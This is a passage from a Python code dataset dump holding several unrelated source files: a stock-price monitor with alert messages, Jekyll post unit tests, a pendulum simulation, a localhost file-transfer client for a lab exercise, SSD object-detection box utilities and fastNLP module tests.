\", str(stock_data[stock_code]))\n return\n '''\n if(stock_code in self.stock_info_store):\n if ((stock_data[stock_code]['ask_all_volume'] == 0) or\n (stock_data[stock_code]['bid_all_volume'] == 0) or \n (self.stock_info_store[stock_code]['bid_all_volume'] == 0)):\n continue\n \n if(stock_data[stock_code]['bid_all_volume']/ \\\n stock_data[stock_code]['ask_all_volume'] >= 3) :\n pass\n # self.debug_print(\"Somebody is biding heavily on this stock \",\n # str(stock_data[stock_code]))\n if(stock_data[stock_code]['bid_all_volume'] / \\\n self.stock_info_store[stock_code]['bid_all_volume'] > 1.5):\n pass\n # self.debug_print(\"many more bids than 15s before\", \\\n # str(stock_data[stock_code]))\n if(stock_data[stock_code]['rate'] >= \\\n (self.stock_info_store[stock_code]['rate'] + 0.6) or \\\n stock_data[stock_code]['rate'] <= \\\n (self.stock_info_store[stock_code]['rate'] - 0.6) ) :\n pass\n # self.debug_print(\"Some stock have wide fluctuation \", \\\n # str(stock_data[stock_code])) \n\n def monitor_index(self, index_data):\n for index in index_data:\n if index in self.index_data_store:\n if (index_data[index]['change'] > 0):\n symbol_index_change = '\\u2197'\n elif (index_data[index]['change'] == 0):\n symbol_index_change = '\\u2192'\n else :\n symbol_index_change = '\\u2198'\n\n index_minus_last_time = round(index_data[index]['now'] -\n self.index_data_store[index]['now'],2)\n if (index_minus_last_time > 0) :\n symbol_minus_last = '\\u2197'\n elif( index_minus_last_time == 0):\n symbol_minus_last = '\\u2192'\n else:\n symbol_minus_last = '\\u2198'\n print('{0} {1} {2}% {3}{4} 与上一采集周期相比 {5}{6}'.format(index_data[index]['name'] ,\n index_data[index]['now'], index_data[index]['rate'],\n symbol_index_change,index_data[index]['change'],\n symbol_minus_last,index_minus_last_time))\n\n def monitor_watch_stock(self, watch_stock_data):\n for watch_stock in watch_stock_data:\n if (watch_stock_data[watch_stock]['change'] > 0):\n symbol_watch_stock_change = '\\u2197'\n elif (watch_stock_data[watch_stock]['change'] == 0):\n symbol_watch_stock_change = '\\u2192'\n else :\n symbol_watch_stock_change = '\\u2198'\n\n watch_stock_minus_last_time = round(\n watch_stock_data[watch_stock]['now'] -\n self.watch_stock_data_store[watch_stock]['now'],2)\n if (watch_stock_minus_last_time > 0) :\n symbol_minus_last = '\\u2197'\n elif( watch_stock_minus_last_time == 0):\n symbol_minus_last = '\\u2192'\n else:\n symbol_minus_last = '\\u2198'\n print('{0} {1} {2}% {3}{4} 与上一采集周期相比 {5}{6}'.format(watch_stock_data[watch_stock]['name'] ,\n watch_stock_data[watch_stock]['now'], watch_stock_data[watch_stock]['rate'],\n symbol_watch_stock_change,watch_stock_data[watch_stock]['change'],\n symbol_minus_last,watch_stock_minus_last_time))\n if(watch_stock_data[watch_stock]['now'] >=\n self.watch_stocks_info[watch_stock]['ceil_alarm_price']):\n print(\"Higher than ceil alarm price\")\n send_info('{}:{} Higher than ceil alarm \\\n price'.format(watch_stock_data[watch_stock]['name'],\n watch_stock_data[watch_stock]['now']),\n str(watch_stock_data[watch_stock]))\n elif(watch_stock_data[watch_stock]['now'] <=\n self.watch_stocks_info[watch_stock]['floor_alarm_price']):\n print(\"lower than floor alarm price\")\n send_info('{}:{} lower than floor alarm \\\n price'.format(watch_stock_data[watch_stock]['name'], watch_stock_data[watch_stock]['now']),str(watch_stock_data[watch_stock]))\n print('买一{0}: {1} | 买二{2}: {3} | 买三{4}: {5} | 买四{6}: {7} | 买五{8}: {9}'.format(watch_stock_data[watch_stock]['bid1'], \n 
int(watch_stock_data[watch_stock]['bid1_volume']),\n watch_stock_data[watch_stock]['bid2'], \n int(watch_stock_data[watch_stock]['bid2_volume']),\n watch_stock_data[watch_stock]['bid3'], \n int(watch_stock_data[watch_stock]['bid3_volume']),\n watch_stock_data[watch_stock]['bid4'], \n int(watch_stock_data[watch_stock]['bid4_volume']),\n watch_stock_data[watch_stock]['bid5'], \n int(watch_stock_data[watch_stock]['bid5_volume'])))\n\n print('卖一{0}: {1} | 卖二{2}: {3} | 卖三{4}: {5} | 卖四{6}: {7} | 卖五{8}: {9}'.format( watch_stock_data[watch_stock]['ask1'],\n int(watch_stock_data[watch_stock]['ask1_volume']),\n watch_stock_data[watch_stock]['ask2'], \n int(watch_stock_data[watch_stock]['ask2_volume']),\n watch_stock_data[watch_stock]['ask3'], \n int(watch_stock_data[watch_stock]['ask3_volume']),\n watch_stock_data[watch_stock]['ask4'], \n int(watch_stock_data[watch_stock]['ask4_volume']),\n watch_stock_data[watch_stock]['ask5'], \n int(watch_stock_data[watch_stock]['ask5_volume'])))\n# print(\"{}\".format(watch_stock_data[watch_stock]['recent_deals']))\n recent_deal_list = watch_stock_data[watch_stock]['recent_deals'].split('|')\n\n local_time_list = []\n print('时 间 成交价(元)\t成交量\t性质')\n for deal in recent_deal_list:\n deal_list = deal.split('/')\n if(deal_list[0] not in self.deal_time_store):\n# buy_or_sell = '\\033[91m买盘\\033[00m' if deal_list[3] == 'B' \\\n# else '\\033[92m卖盘\\033[00m'\n buy_or_sell = '买盘' if deal_list[3] == 'B' \\\n else '\\033[92m卖盘\\033[00m'\n\n print('{0}\t{1}\t{2}\t{3}'.format(deal_list[0],\n deal_list[1],deal_list[2], buy_or_sell))\n local_time_list.append(deal_list[0])\n self.deal_time_store = local_time_list.copy()\n \n\n \n def need_pay_attention(self, code , potential_stocks_dict,stock_data):\n last_daily_list = potential_stocks_dict[code][7]\n vol_list = [float(x[5]) for x in last_daily_list]\n avg_vol = mean(vol_list)\n# print('{} {} '.format(code, avg_vol))\n\n return bool(stock_data[code]['now'] >= 0.99*potential_stocks_dict[code][5] and \n stock_data[code]['deal_vol'] > 2*avg_vol)\n\n\n\n\n def monitor_potential_stocks(self,stock_data):\n tmp_stocks_dict = self.get_potential_stocks_from_file()\n potential_stocks_dict = { x[2:]:tmp_stocks_dict[x] for x in\\\n tmp_stocks_dict}\n for code in potential_stocks_dict :\n if code in stock_data:\n if (self.need_pay_attention(code\n ,potential_stocks_dict,stock_data)):\n print('{} {} have big turnover suddenly and is potential'.format(code,potential_stocks_dict[code][0]))\n if(code not in self.already_informed_stocks) :\n send_info('{} {} have big turnover suddenly and is potential'.format(code,potential_stocks_dict[code][0]))\n self.already_informed_stocks.append(code)\n\n def is_reach_highest(self, code , highest_stocks_dict,stock_data):\n# print('{} {} '.format(code, avg_vol))\n\n if (stock_data[code]['now'] >= 0.99*highest_stocks_dict[code][5] and stock_data[code]['deal_vol'] > 1.5*highest_stocks_dict[code][6]):\n return True\n else :\n return False\n\n \n def monitor_reach_n_days_highest_stocks(self,stock_data):\n tmp_stocks_dict = self.get_n_days_highest_price_from_file()\n highest_stocks_dict = { x[2:]:tmp_stocks_dict[x] for x in\\\n tmp_stocks_dict}\n for code in highest_stocks_dict :\n if code in stock_data:\n if (self.is_reach_highest(code\n ,highest_stocks_dict,stock_data)):\n print('Debug , {} {} is reach n days highest price'.format(code,highest_stocks_dict[code][0]))\n if(code not in self.already_informed_stocks) :\n send_info('Debug , {} {} is reach n days highest 
price'.format(code,highest_stocks_dict[code][0]))\n self.already_informed_stocks.append(code)\n \n\n\n \n \n\n \n\n\n \n\n\n def monitor_stock(self,stock_data,index_data,watch_stock_data) :\n self.monitor_biding_and_fluctuation(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n #little usage ? the algorithm is wrong ?\n self.monitor_stock_price_range(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n\n self.monitor_surged_decline_limits(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n self.monitor_index(index_data)\n print('+++++++++++++++++++++++++++++++++')\n self.monitor_watch_stock(watch_stock_data)\n print('+++++++++++++++++++++++++++++++++')\n \n if (MONITOR_POTENTIAL) :\n self.monitor_potential_stocks(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n self.monitor_reach_n_days_highest_stocks(stock_data)\n print('+++++++++++++++++++++++++++++++++')\n\n \n def stock_debug_func(self):\n print(self.stock_list)\n\n \n def save_info(self, stock_data, index_data, watch_stock_data):\n self.stock_info_store = stock_data.copy()\n self.index_data_store = index_data.copy()\n self.watch_stock_data_store = watch_stock_data.copy()\n \n \n def stock_main_func(self):\n #because stock list is too large , sometimes it will meet \n #Response payload is not completed error\n #so do some retry here\n for attempt in range(10):\n try:\n #stock codes get \n stock_data = self.quotation.stocks(self.stock_list)\n except:\n print(\"Attempt {}: Meet payload not completed error\".format(attempt))\n else:\n break\n else:\n print(\"Try too many times to get stock data, exit the program\")\n send_info(\"Your stock program terminated now because try too many \\\n times to fetch stock data\")\n sys.exit()\n\n #all index get\n index_data = self.quotation.stocks(self.index_list)\n\n watch_stock_data = self.quotation.stocks(self.watch_stocks_list)\n\n\n self.preprocess_stock_index_data(stock_data, index_data,\n watch_stock_data)\n if (self.first_time == 0) :\n print(\"not the first time calling\")\n# print(self.stock_list)\n self.monitor_stock(stock_data, index_data,watch_stock_data)\n else :\n print(\"the first time calling\")\n self.first_time = 0\n self.save_info(stock_data, index_data,watch_stock_data)\n\nif __name__ == \"__main__\":\n\n#### 更新股票代码\n easyquotation.update_stock_codes()\n watch_stocks = \\\n {\n '600970':{'ceil_alarm_price':11.1,'floor_alarm_price':10.9},\n '300059':{'ceil_alarm_price':16.5,'floor_alarm_price':16.0},\n '600999':{'ceil_alarm_price':20.70,'floor_alarm_price':20.0},\n '000425':{'ceil_alarm_price':4.95,'floor_alarm_price':4.83},\n }\n\n my_stock = stock_monitor('qq',watch_stocks)\n while 1:\n my_stock.stock_main_func()\n# my_stock.stock_debug_func()\n print(\"#############################################\");\n time.sleep(10)\n\n\n\n\n","sub_path":"stock_monitor_qq.py","file_name":"stock_monitor_qq.py","file_ext":"py","file_size_in_byte":23285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"134434122","text":"import os\nimport datetime\nimport unittest\nfrom Hyde import Hyde, DuplicatePostError\nfrom TestUtility import TestUtility\n\n\nclass JekyllPostTest(unittest.TestCase, Hyde):\n\t\"\"\"\n\tTests adding a post and ensures the file is created.\n\tThen cleans up the file and the directory.\n\t\"\"\"\n\tdef test_handle_add_draft_post(self):\n\t\tpost_title = 'a draft title'\n\t\tdraft_root = '_drafts/'\n\t\tpath = draft_root + 'posts/'\n\t\tHyde._handle_add_post(post_title, path)\n\t\tactual_title = 
TestUtility.build_jekyll_post_title('a-draft-title') + '.md'\n\t\tactual_file = path + actual_title\n\t\tself.assertTrue(os.path.exists(path))\n\t\tself.assertTrue(os.path.isfile(actual_file))\n\t\texpected_post_contents = JekyllPostTest.get_expected_post_contents(post_title)\n\t\tactual_post_contents = JekyllPostTest.get_actual_post_contents(actual_file)\n\t\tself.assertEqual(expected_post_contents, actual_post_contents)\n\t\tTestUtility.remove_file(actual_file)\n\t\tself.assertFalse(os.path.isfile(actual_file))\n\t\tTestUtility.remove_directory(path)\n\t\tTestUtility.remove_directory(draft_root)\n\t\tself.assertFalse(os.path.exists(path))\n\t\tself.assertFalse(os.path.exists(draft_root))\n\n\tdef test_handle_add_duplicate_draft_post(self):\n\t\tpost_title = 'a draft title'\n\t\tdraft_root = '_drafts/'\n\t\tpath = draft_root + '/posts/'\n\t\tHyde._handle_add_post(post_title, path)\n\t\tactual_title = TestUtility.build_jekyll_post_title('a-draft-title') + '.md'\n\t\tactual_file = path + actual_title\n\t\tself.assertTrue(os.path.exists(path))\n\t\tself.assertTrue(os.path.isfile(actual_file))\n\t\twith self.assertRaises(DuplicatePostError) as err:\n\t\t\tHyde._handle_add_post(post_title, path)\n\n\t\tself.assertEqual(\"The file \"+path+actual_title+\" already exists. Nothing Created.\", err.exception.msg)\n\t\tTestUtility.remove_file(actual_file)\n\t\tself.assertFalse(os.path.isfile(actual_file))\n\t\tTestUtility.remove_directory(path)\n\t\tTestUtility.remove_directory(draft_root)\n\t\tself.assertFalse(os.path.exists(path))\n\t\tself.assertFalse(os.path.exists(draft_root))\n\n\tdef test_create_jekyll_draft_post_title(self):\n\t\t\"\"\"\n\t\tTests the creation of Jekyll draft post title using the Jekyll format.\n\t\t\"\"\"\n\t\tactual_title = Hyde.create_jekyll_post_title('title for this unit test')\n\t\texpected_title = TestUtility.build_jekyll_post_title('title-for-this-unit-test')\n\t\tself.assertEquals(expected_title, actual_title)\n\n\t@staticmethod\n\tdef get_expected_post_contents(post_title):\n\t\t\"\"\"\n\t\tCreates a post template list for testing.\n\t\t@param post_title: the title of the post.\n\t\t@return: the expected post template list.\n\t\t\"\"\"\n\t\texpected_post = ['---\\n',\n\t\t\t'layout: post\\n',\n\t\t\t'title: ' + post_title + '\\n',\n\t\t\t'date: ' + str(datetime.date.today()) + '\\n',\n\t\t\t'---\\n']\n\n\t\treturn expected_post\n\n\t@staticmethod\n\tdef get_actual_post_contents(post_file):\n\t\t\"\"\"\n\t\tReads and returns the contents of a post file.\n\t\t@param post_file: the post file to read.\n\t\t@return: post file contents as a list of lines.\n\t\t\"\"\"\n\t\twith open(post_file) as post_file:\n\t\t\tactual_file = post_file.readlines()\n\n\t\treturn actual_file\n\nif __name__ == '__main__':# pragma: no cover\n\tunittest.main()\n","sub_path":"tests/JekyllDraftPostTests.py","file_name":"JekyllDraftPostTests.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"170300643","text":"from numpy import *\n\ndt=0.01\ng=9.8\nL=1\ntheta=1\nomega=0\n\nwhile True: \n # Euler-Cromer-Aspel update\n theta=theta+omega*dt\n omega=omega-g/L*sin(theta)*dt\n \n # Animation\n x=sin(theta)\n y=-cos(theta)\n print (\"l3\",0,0,0,x,y,0)\n print (\"ct3\",0,x,y,0,0.05)\n print (\"F\")\n","sub_path":"pendulum-basic.py","file_name":"pendulum-basic.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
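# ---------------------------------------------------------------------------
# Aside (not a corpus record): the records above all share one JSONL schema —
# a "text" field holding the escaped source file plus metadata such as
# "sub_path", "file_name", "program_lang", and "dataset". Below is a minimal
# sketch, under stated assumptions, of how one might replay this dump back
# into source files. The field names are taken from the records themselves;
# the input and output paths are hypothetical, and anything that is not a
# complete JSON object on its own line (diff headers, comment blocks like
# this one, records split across physical lines) is simply skipped.
import json
import os

def extract_sources(jsonl_path, out_dir):
    """Write each record's "text" payload out to its recorded "sub_path"."""
    with open(jsonl_path, "r", encoding="utf-8") as f:
        for raw in f:
            raw = raw.lstrip("+").strip()  # tolerate diff-style "+" prefixes
            if not raw.startswith("{"):
                continue  # skip headers, comments, and blank lines
            try:
                record = json.loads(raw)
            except json.JSONDecodeError:
                continue  # skip fragments that are not a full record
            dest = os.path.join(out_dir, record["sub_path"])
            parent = os.path.dirname(dest)
            if parent:
                os.makedirs(parent, exist_ok=True)
            with open(dest, "w", encoding="utf-8") as out:
                out.write(record["text"])

# Hypothetical usage: extract_sources("1162.jsonl", "extracted/")
# ---------------------------------------------------------------------------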
+{"seq_id":"354672636","text":"import sys, socket, time, random, hashlib\n\n# log function that flushes stdout, to help with\n# buffering of stdout.\ndef log(s):\n print(time.time(), name + \": \" + s)\n sys.stdout.flush()\n\n# only port and client \"name\" are included on command-line; assume\n# 'localhost' for host.\nport = int(sys.argv[1])\nname = sys.argv[2]\n\n# we want a 'random' delay, but it has to be predictable, as well,\n# for grading purposes. So we seed the random number generator with\n# a hash of the name. (We could have just hand-picked a different delay\n# for each of the 10 clients, but then what if we decide to run it later\n# with 100 clients??\nm = hashlib.md5(name.encode())\ni = 0\nfor x in m.digest(): i += x\nrandom.seed(i)\ndelay = random.randint(2, 6)\n\n# The rest is just the GET protocol hard-coded, with some log\n# output so we know when the client goes through certain milestones.\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((\"localhost\", port))\nready = sock.recv(1024)\n\nlog(\"READY (%d delay).\" % delay)\n\nsock.send(\"GET test.txt\".encode(\"UTF-8\"))\nok = sock.recv(1024)\nsock.send(\"READY\".encode(\"UTF-8\"))\ntotalBytes = int.from_bytes(sock.recv(1024), byteorder='big', signed=False)\nsock.send(\"OK\".encode(\"UTF-8\"))\nf = open(\"test.txt\", \"wb\")\nbytesLeft = totalBytes\n\nlog(\"receiving\")\n\n# An artificial delay, so we can see the effect of having multiple clients\n# actually waiting in the server's queue.\ntime.sleep(delay)\nwhile(bytesLeft > 0):\n\tdata = sock.recv(min(1024, bytesLeft))\n\tbytesLeft -= len(data)\n\tf.write(data)\nf.close()\ndone = sock.recv(1024)\n\nlog(\"DONE\")\n\nsock.close()\n\t\n","sub_path":"Lab_4/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"373713489","text":"import json\nimport os\nimport torch\nimport random\nimport numpy as np\nimport xml.etree.ElementTree as ET\nimport torchvision.transforms.functional as FT\nfrom torchvision import transforms\nfrom PIL import Image\nimport cv2\n\n\n\n# SINGAPORE_od labels and color setting (Bus)\n########################################################################################################################\n# Label map\nElan_od_singapore_rev_label_map={}\nElan_od_singapore_labels = ('b', 't', 'm', 'k', 'c')\nElan_od_singapore_label_map = {k: v + 1 for v, k in enumerate(Elan_od_singapore_labels)}\nElan_od_singapore_label_map['background'] = 0\nElan_od_singapore_rev_label_map = {v: k for k, v in Elan_od_singapore_label_map.items()} # Inverse mapping\n\n# Color map for bounding boxes of detected objects from https://sashat.me/2017/01/11/list-of-20-simple-distinct-colors/\nElan_od_singapore_distinct_colors = ['#e6194b', '#3cb44b', '#ffe119', '#0082c8', '#f58231', '#008080']\nElan_od_singapore_label_color_map = {k: Elan_od_singapore_distinct_colors[i] for i, k in enumerate(Elan_od_singapore_label_map.keys())}\n########################################################################################################################\n\n\ndef parse_annotation_SINGAPORE_od(annotation_path, label_map):\n \n bboxes = fun_json2ObjLoc(annotation_path)\n \n boxes = list()\n labels = list()\n difficulties = list()\n # difficulties = [0]*len(bboxes)\n \n for box in bboxes:\n\n # difficult = int(object.find('difficult').text == '1')\n difficult = int(0)\n\n label = box['label']\n if len(label) > 1:\n label = str(label[0])\n if 
label not in label_map:\n print('False Label Image: {}'.format(annotation_path))\n print(box['label'])\n continue\n box_pp = box['points']\n\n boxes.append(box_pp)\n labels.append(label_map[label])\n difficulties.append(difficult)\n return {'boxes': boxes, 'labels': labels, 'difficulties': difficulties}\n\n\ndef fun_json2ObjLoc(json_filepath):\n with open(json_filepath, 'r') as f:\n data = json.load(f) \n bboxes=[]\n for shape in data['shapes']:\n if shape['shape_type']=='rectangle':\n label = shape['label']\n points = shape['points']\n box={}\n box['label']=label\n x_min = min(points[0][0], points[1][0])\n y_min = min(points[0][1], points[1][1])\n x_max = max(points[0][0], points[1][0])\n y_max = max(points[0][1], points[1][1])\n box['points']=[x_min,y_min,x_max, y_max]\n bboxes.append(box)\n return bboxes\n\ndef create_data_lists_SINGAPORE_od(train_path, test_path, output_folder, flag_apply= 'Day'):\n \"\"\"\n Create lists of images, the bounding boxes and labels of the objects in these images, and save these to file.\n\n :param train_path: path to the 'train.txt' folder\n :param test_path: path to the 'test.txt' folder\n :param output_folder: folder where the JSONs must be saved\n \"\"\"\n\n label_map = Elan_od_singapore_label_map\n # if flag_apply == 'Day':\n # label_map = Elan_od_CVAT_Day_label_map\n # if flag_apply == 'Night':\n # label_map = Elan_od_CVAT_Night_label_map\n\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n if isinstance(train_path, str):\n train_path = [os.path.abspath(train_path)]\n elif isinstance(train_path, list):\n train_path = [os.path.abspath(x) for x in train_path]\n\n if isinstance(test_path, str):\n test_path = [os.path.abspath(test_path)]\n elif isinstance(test_path, list):\n test_path = [os.path.abspath(x) for x in test_path]\n \n print(train_path)\n print(test_path)\n\n train_images = list()\n train_objects = list()\n n_objects = 0\n\n # Training data\n for path in train_path:\n\n # Find IDs of images in training data\n with open(path) as f:\n ids = f.read().splitlines()\n\n for id in ids:\n id = id.split(\",\")\n train_img = id[0].strip()\n train_label = id[1].strip()\n # print(train_img)\n # print(train_label)\n \n # Parse annotation's XML file\n objects = parse_annotation_SINGAPORE_od(train_label, label_map)\n \n if len(objects['boxes']) == 0:\n continue\n n_objects += len(objects['boxes'])\n train_images.append(train_img)\n train_objects.append(objects)\n\n assert len(train_objects) == len(train_images)\n\n # Save to file\n with open(os.path.join(output_folder, 'TRAIN_images.json'), 'w') as j:\n json.dump(train_images, j)\n with open(os.path.join(output_folder, 'TRAIN_objects.json'), 'w') as j:\n json.dump(train_objects, j)\n with open(os.path.join(output_folder, 'label_map.json'), 'w') as j:\n json.dump(label_map, j) # save label map too\n\n print('\\nThere are %d training images containing a total of %d objects. Files have been saved to %s.' 
% (\n len(train_images), n_objects, os.path.abspath(output_folder)))\n\n # # Validation data\n # test_images = list()\n # test_objects = list()\n # n_objects = 0\n\n # for path in test_path:\n # # Find IDs of images in validation data\n # with open(path) as f:\n # ids = f.read().splitlines()\n\n # for id in ids:\n # id = id.split(\",\")\n # test_img = id[0].strip()\n # test_label = id[1].strip()\n\n # # Parse annotation's XML file\n # objects = parse_annotation_Elan_od(test_label,label_map)\n # if len(objects['boxes']) == 0:\n # continue\n # n_objects += len(objects['boxes'])\n # test_images.append(test_img)\n # test_objects.append(objects)\n\n # assert len(test_objects) == len(test_images)\n\n # # Save to file\n # with open(os.path.join(output_folder, 'TEST_images.json'), 'w') as j:\n # json.dump(test_images, j)\n # with open(os.path.join(output_folder, 'TEST_objects.json'), 'w') as j:\n # json.dump(test_objects, j)\n\n # print('\\nThere are %d validation images containing a total of %d objects. Files have been saved to %s.' % (\n # len(test_images), n_objects, os.path.abspath(output_folder)))\n\n\t\ndef decimate(tensor, m):\n \"\"\"\n Decimate a tensor by a factor 'm', i.e. downsample by keeping every 'm'th value.\n\n This is used when we convert FC layers to equivalent Convolutional layers, BUT of a smaller size.\n\n :param tensor: tensor to be decimated\n :param m: list of decimation factors for each dimension of the tensor; None if not to be decimated along a dimension\n :return: decimated tensor\n \"\"\"\n assert tensor.dim() == len(m)\n for d in range(tensor.dim()):\n if m[d] is not None:\n tensor = tensor.index_select(dim=d,\n index=torch.arange(start=0, end=tensor.size(d), step=m[d]).long())\n\n return tensor\n\n\n\ndef xy_to_cxcy(xy):\n \"\"\"\n Convert bounding boxes from boundary coordinates (x_min, y_min, x_max, y_max) to center-size coordinates (c_x, c_y, w, h).\n\n :param xy: bounding boxes in boundary coordinates, a tensor of size (n_boxes, 4)\n :return: bounding boxes in center-size coordinates, a tensor of size (n_boxes, 4)\n \"\"\"\n return torch.cat([(xy[:, 2:] + xy[:, :2]) / 2, # c_x, c_y\n xy[:, 2:] - xy[:, :2]], 1) # w, h\n\n\ndef cxcy_to_xy(cxcy):\n \"\"\"\n Convert bounding boxes from center-size coordinates (c_x, c_y, w, h) to boundary coordinates (x_min, y_min, x_max, y_max).\n\n :param cxcy: bounding boxes in center-size coordinates, a tensor of size (n_boxes, 4)\n :return: bounding boxes in boundary coordinates, a tensor of size (n_boxes, 4)\n \"\"\"\n return torch.cat([cxcy[:, :2] - (cxcy[:, 2:] / 2), # x_min, y_min\n cxcy[:, :2] + (cxcy[:, 2:] / 2)], 1) # x_max, y_max\n\n\ndef cxcy_to_gcxgcy(cxcy, priors_cxcy):\n \"\"\"\n Encode bounding boxes (that are in center-size form) w.r.t. 
the corresponding prior boxes (that are in center-size form).\n\n For the center coordinates, find the offset with respect to the prior box, and scale by the size of the prior box.\n For the size coordinates, scale by the size of the prior box, and convert to the log-space.\n\n In the model, we are predicting bounding box coordinates in this encoded form.\n\n :param cxcy: bounding boxes in center-size coordinates, a tensor of size (n_priors, 4)\n :param priors_cxcy: prior boxes with respect to which the encoding must be performed, a tensor of size (n_priors, 4)\n :return: encoded bounding boxes, a tensor of size (n_priors, 4)\n \"\"\"\n\n # The 10 and 5 below are referred to as 'variances' in the original Caffe repo, completely empirical\n # They are for some sort of numerical conditioning, for 'scaling the localization gradient'\n # See https://github.com/weiliu89/caffe/issues/155\n return torch.cat([(cxcy[:, :2] - priors_cxcy[:, :2]) / (priors_cxcy[:, 2:] / 10), # g_c_x, g_c_y\n torch.log(cxcy[:, 2:] / priors_cxcy[:, 2:]) * 5], 1) # g_w, g_h\n\n\ndef gcxgcy_to_cxcy(gcxgcy, priors_cxcy):\n \"\"\"\n Decode bounding box coordinates predicted by the model, since they are encoded in the form mentioned above.\n\n They are decoded into center-size coordinates.\n\n This is the inverse of the function above.\n\n :param gcxgcy: encoded bounding boxes, i.e. output of the model, a tensor of size (n_priors, 4)\n :param priors_cxcy: prior boxes with respect to which the encoding is defined, a tensor of size (n_priors, 4)\n :return: decoded bounding boxes in center-size form, a tensor of size (n_priors, 4)\n \"\"\"\n\n return torch.cat([gcxgcy[:, :2] * priors_cxcy[:, 2:] / 10 + priors_cxcy[:, :2], # c_x, c_y\n torch.exp(gcxgcy[:, 2:] / 5) * priors_cxcy[:, 2:]], 1) # w, h\n\n\ndef find_intersection(set_1, set_2):\n \"\"\"\n Find the intersection of every box combination between two sets of boxes that are in boundary coordinates.\n\n :param set_1: set 1, a tensor of dimensions (n1, 4)\n :param set_2: set 2, a tensor of dimensions (n2, 4)\n :return: intersection of each of the boxes in set 1 with respect to each of the boxes in set 2, a tensor of dimensions (n1, n2)\n \"\"\"\n\n # PyTorch auto-broadcasts singleton dimensions\n lower_bounds = torch.max(set_1[:, :2].unsqueeze(1), set_2[:, :2].unsqueeze(0)) # (n1, n2, 2)\n upper_bounds = torch.min(set_1[:, 2:].unsqueeze(1), set_2[:, 2:].unsqueeze(0)) # (n1, n2, 2)\n intersection_dims = torch.clamp(upper_bounds - lower_bounds, min=0) # (n1, n2, 2)\n return intersection_dims[:, :, 0] * intersection_dims[:, :, 1] # (n1, n2)\n\n\ndef find_jaccard_overlap(set_1, set_2):\n \"\"\"\n Find the Jaccard Overlap (IoU) of every box combination between two sets of boxes that are in boundary coordinates.\n\n :param set_1: set 1, a tensor of dimensions (n1, 4)\n :param set_2: set 2, a tensor of dimensions (n2, 4)\n :return: Jaccard Overlap of each of the boxes in set 1 with respect to each of the boxes in set 2, a tensor of dimensions (n1, n2)\n \"\"\"\n\n # Find intersections\n intersection = find_intersection(set_1, set_2) # (n1, n2)\n\n # Find areas of each box in both sets\n areas_set_1 = (set_1[:, 2] - set_1[:, 0]) * (set_1[:, 3] - set_1[:, 1]) # (n1)\n areas_set_2 = (set_2[:, 2] - set_2[:, 0]) * (set_2[:, 3] - set_2[:, 1]) # (n2)\n\n # Find the union\n # PyTorch auto-broadcasts singleton dimensions\n union = areas_set_1.unsqueeze(1) + areas_set_2.unsqueeze(0) - intersection # (n1, n2)\n\n # #box iou\n # output = intersection/ areas_set_2\n\n return intersection / 
union # (n1, n2)\n\n\n\ndef load_best_checkpoint(model, save_path):\n \"\"\"\n Load the best model checkpoint.\n\n :param model: model\n :param save_path: the path the saved the best model checkpoint\n \"\"\"\n filename = 'checkpoint.pth.tar'\n checkpoint = torch.load(os.path.join(save_path, 'BEST_' + filename))\n best_model = checkpoint['model']\n model.load_state_dict(best_model.state_dict())\n print(\"loaded the model weight from {}\".format(os.path.join(save_path, 'BEST_' + filename)))\n","sub_path":"OnlineInference/src/utils_car.py","file_name":"utils_car.py","file_ext":"py","file_size_in_byte":12242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"45523855","text":"import unittest\n\nimport torch\n\nfrom fastNLP.modules.other_modules import GroupNorm, LayerNormalization, BiLinear\n\n\nclass TestGroupNorm(unittest.TestCase):\n def test_case_1(self):\n gn = GroupNorm(num_features=1, num_groups=10, eps=1.5e-5)\n x = torch.randn((20, 50, 10))\n y = gn(x)\n\n\nclass TestLayerNormalization(unittest.TestCase):\n def test_case_1(self):\n ln = LayerNormalization(d_hid=5, eps=2e-3)\n x = torch.randn((20, 50, 5))\n y = ln(x)\n\n\nclass TestBiLinear(unittest.TestCase):\n def test_case_1(self):\n bl = BiLinear(n_left=5, n_right=5, n_out=10, bias=True)\n x_left = torch.randn((7, 10, 20, 5))\n x_right = torch.randn((7, 10, 20, 5))\n y = bl(x_left, x_right)\n print(bl)\n bl2 = BiLinear(n_left=15, n_right=15, n_out=10, bias=True)\n","sub_path":"test/modules/test_other_modules.py","file_name":"test_other_modules.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"252806517","text":"# Copyright 2014 Google Inc. 
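The four coordinate helpers and find_jaccard_overlap in utils_car.py above fit together as two inverse pairs plus an IoU built from intersections and areas. The following self-contained sketch (assuming PyTorch is installed; the helpers are re-inlined so the snippet runs on its own) checks both round trips and one IoU value:

import torch

def xy_to_cxcy(xy):
    # (x_min, y_min, x_max, y_max) -> (c_x, c_y, w, h)
    return torch.cat([(xy[:, 2:] + xy[:, :2]) / 2, xy[:, 2:] - xy[:, :2]], 1)

def cxcy_to_xy(cxcy):
    # (c_x, c_y, w, h) -> (x_min, y_min, x_max, y_max)
    return torch.cat([cxcy[:, :2] - cxcy[:, 2:] / 2, cxcy[:, :2] + cxcy[:, 2:] / 2], 1)

def cxcy_to_gcxgcy(cxcy, priors):
    # offsets scaled by the empirical 'variances' (10 for centers, 5 for log-sizes)
    return torch.cat([(cxcy[:, :2] - priors[:, :2]) / (priors[:, 2:] / 10),
                      torch.log(cxcy[:, 2:] / priors[:, 2:]) * 5], 1)

def gcxgcy_to_cxcy(g, priors):
    return torch.cat([g[:, :2] * priors[:, 2:] / 10 + priors[:, :2],
                      torch.exp(g[:, 2:] / 5) * priors[:, 2:]], 1)

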